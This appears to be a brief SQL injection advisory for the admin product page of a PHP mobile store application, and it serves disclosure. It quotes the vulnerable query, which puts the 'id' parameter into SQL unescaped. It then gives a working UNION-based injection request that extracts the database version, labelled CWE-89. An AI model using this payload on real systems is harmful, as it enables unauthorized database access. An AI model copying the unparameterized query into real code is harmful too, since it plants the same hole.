/admin/product/manage_product.php
<?php
if(isset($_GET['id']) && $_GET['id'] > 0){
$qry = $conn->query("SELECT * from `products` where id = '{$_GET['id']}' ");
if($qry->num_rows > 0){
foreach($qry->fetch_assoc() as $k => $v){
$$k=stripslashes($v);
}
}
}
?>
HTTP Request Example
GET /mobile_store/admin/?page=product/manage_product&id=1'+AND+FALSE+UNION+SELECT+1,2,3,4,version(),6,7,8--+- HTTP/1.1
Host: [REDACTED]
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')